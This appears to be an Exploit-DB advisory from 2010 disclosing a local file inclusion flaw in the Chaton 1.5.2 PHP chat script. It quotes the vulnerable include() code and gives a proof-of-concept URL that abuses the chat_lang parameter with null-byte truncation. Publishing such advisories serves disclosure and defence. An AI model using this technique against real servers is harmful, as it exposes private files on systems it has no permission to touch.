Chaton 1.5.2 - Local File Inclusion

EDB-ID:

11657

CVE:

N/A


Author:

cr4wl3r

Type:

webapps


Platform:

PHP

Date:

2010-03-08


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

[+] Chaton <= 1.5.2 Local File Include Vulnerability
[+] Discovered By: cr4wl3r
[+] Download: Donwload: http://easy-script.com/scripts-dl/chaton-1.5.2.zip
[+] Greetz: opt!x hacker, xoron, cyberlog, mywisdom, irvian, EA ngel, bL4Ck_3n91n3, xharu, zvtral, and all my friend

[+] Code:

    if (file_exists( "lang/$chat_lang/deplacer.php")) {
        include( "lang/$chat_lang/deplacer.php");
    }

    if ($chat_salon != $newsalon) {
        if ($chat_hide == false) {
            // Salle publique = Recupere le vrai nom
            $nomsalle = NomSalonPublic( $newsalon);
            if ($nomsalle == '') {
                // Salon priv�
                $salon_prive = true;
                $nomsalle = $newsalon;
            } else {
                $salon_prive = false;
            }

[+] PoC: [path]/inc/deplacer.php?chat_lang=[LFI%00]